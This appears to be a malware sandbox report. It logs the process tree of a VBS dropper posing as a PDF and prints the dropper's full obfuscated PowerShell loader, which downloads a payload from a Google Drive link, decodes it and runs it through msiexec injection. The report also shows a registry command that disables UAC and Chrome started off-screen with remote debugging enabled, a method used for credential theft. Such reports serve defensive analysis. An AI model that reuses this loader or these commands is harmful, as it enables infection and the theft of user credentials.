PID 3476 wrote to memory of 2268 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2720 wrote to memory of 2436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 2436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 2436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 2436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 3432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 3432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 3432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 3432 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 1488 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 1488 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 1488 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2720 wrote to memory of 1488 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 3752 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 2900 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 2900 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 4368 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 4368 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 4368 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3476 wrote to memory of 4368 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd5c7dcc40,0x7ffd5c7dcc4c,0x7ffd5c7dcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\locl"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vqpdmszr"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gkvwfkjtlop"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4588,i,2624262690528666838,5608340566068074040,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8

